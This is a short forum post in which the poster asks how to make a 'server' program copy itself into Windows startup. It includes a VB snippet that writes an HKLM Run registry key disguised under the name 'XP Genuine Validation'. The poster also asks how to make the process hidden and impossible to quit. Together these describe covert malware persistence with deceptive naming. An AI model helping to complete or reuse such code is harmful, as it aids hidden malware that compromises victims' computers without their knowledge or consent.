hi to all
I want to make a copy of the server before it copies itself into the start-up, and it copies itself into the start-up (file name undefined)
is the code I use but it does not copy
Dim Startup
Set Startup = CreateObject("WScript.Shell")
Startup.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\XP Genuine Validation", App.Path & "\" & App.EXEName & ".exe"
:'(
and i want to make the process hidden and has not quit
thinks to all


LinkBack URL
About LinkBacks
Reply With Quote
